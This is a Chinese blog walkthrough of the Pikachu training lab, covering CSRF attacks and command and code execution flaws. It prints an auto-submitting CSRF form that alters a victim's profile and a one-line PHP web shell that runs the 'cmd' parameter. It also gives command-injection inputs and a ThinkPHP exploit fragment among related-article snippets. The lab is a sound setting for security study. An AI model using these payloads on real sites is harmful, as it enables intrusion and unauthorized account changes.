Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞

Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping” && exec “evel”&&OS命令执行漏洞

CSRF(get) login

tips(再点一下关闭)这里一共有这么些用户vince/allen/kobe/grady/kevin/lucy/lili,密码全部是123456

先抓包

修改个个人信息看看

直接在burpsuite里改add为hackerhah

CSRF(POST)

这里使用别人写的script，放到pikachu-master/ vul/csrf上,代码如下
当提交方式是post时
和xss的post型攻击差不多，攻击者构造一个自己的攻击站点，当lucy点击时，就会向服务器提交post修改个人信息

<html>
<head>
<script>
window.onload = function() {document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpos/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="girl" /><input id="phonenum" type="text" name="phonenum" value="12345678922" /><input id="add" type="text" name="add" value="hacker" /><input id="email" type="text" name="email" value="lucy@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

不知道上面原因一点击提交就会跳到http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_get_login.php里面，虽然post.html里面写的是
http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php

CSRF Token login
查看源代码：

抓包，看到有token参数。
token：随机码，每次请求，都增加一个随机码，后台每次对这个随机码进行验证

与前面比较，这里多了一个Token，如果后台对提交的Token进行了验证，由于Token是随机的，我们就无法伪造URL了

看下控制台源码，看下这个表单，每次点击修改个人信息都会去访问 token_get_edit_.php 这个文件，这个文件就会生成一个token，
value就是后端发过来的，type是隐藏的额，在前端看不到，但是在源码中能看到。

每次点提交，token也会被提交到后台，后台会对token进行验证，如果和当前session里面的token相等，才会让你提交。

OS命令执行漏洞:

Ipconfig ifconfig
Whoami
Net user
index2.php

<?php
$action = $_GET['cmd'];
echo "<pre>";
echo system($action);
echo "</pre>";
?>

Pikachu exec “ping” && exec "evel"

Pikachu exec "ping"

远程命令执行，我们直接输入： 127.0.0.1我们发现出现了乱码

同时按"win + R" ，并输入 regedit 进入注册表
找到 HKEY_CURRENT_USER\Console%SystemRoot%_system32_cmd.exe，如果该项下已存在 CodePage 项，则把值改为十进制 “65001”，点击确定即可；如果不存在，在该项下新建一个 DWORD（32位值），命名为 “CodePage”，值设为 “65001”。然后关闭注册表管理器。
然后再重新输入命令查看结果：

exec “eval”：

后台会执行响应的 php 代码，我们可以输入下面的代码：phpinfo();

后续操作请持续关注哦！！！
了解更多请关注下列公众号：

Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞相关推荐

php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析
1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...
漏洞情报 | 锐捷RSR路由器设备存在命令执行漏洞
点击上方订阅话题第一时间了解漏洞威胁 0x01 漏洞描述 2021年4月14日,360漏洞云监测到锐捷网络官方通告了锐捷网络RSR路由器系列产品的Web管理存在命令执行漏洞(CNVD-2021 ...
Goby漏洞更新 | 斐讯 FIR302B management.cgi 远程命令执行漏洞 (CVE-2022-27373)
漏洞名称:斐讯 FIR302B management.cgi 远程命令执行漏洞 (CVE-2022-27373) English Name:PHICOMM FIR302B management.cgi ...
DVWA——命令执行漏洞学习
前言:命令执行和代码执行也是web安全中常见的一种漏洞,这次就先来学习一下命令执行漏洞. Command Execution 一.简介由于开发人员在编写源代码时,没有对源代码中可执行的特殊函数入口做 ...
webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
命令执行——命令执行漏洞及（四）
普及DVWA中的命令执行漏洞并通过源码分析深入了解命令执行漏洞 DVWA介绍点我查看搭建方法 DVWA(Damn Vulnerable Web Application) 平台: >用来进行安全 ...
jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
深信服行为感知命令执行漏洞
深信服行为感知命令执行漏洞 1.深信服行为感知漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构建漏洞URL 1.3.2.1.查询IP地址 1.3.2.2 ...
闲人的命令执行漏洞基础学习1
命令执行漏洞是指攻击者可以随意执行系统命令. 在window和Linux系统下: && & || |符号可以作为命令连接符使用. 如ping url && ne ...

Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞

Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping” && exec “evel”&&OS命令执行漏洞

Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞相关推荐

最新文章

热门文章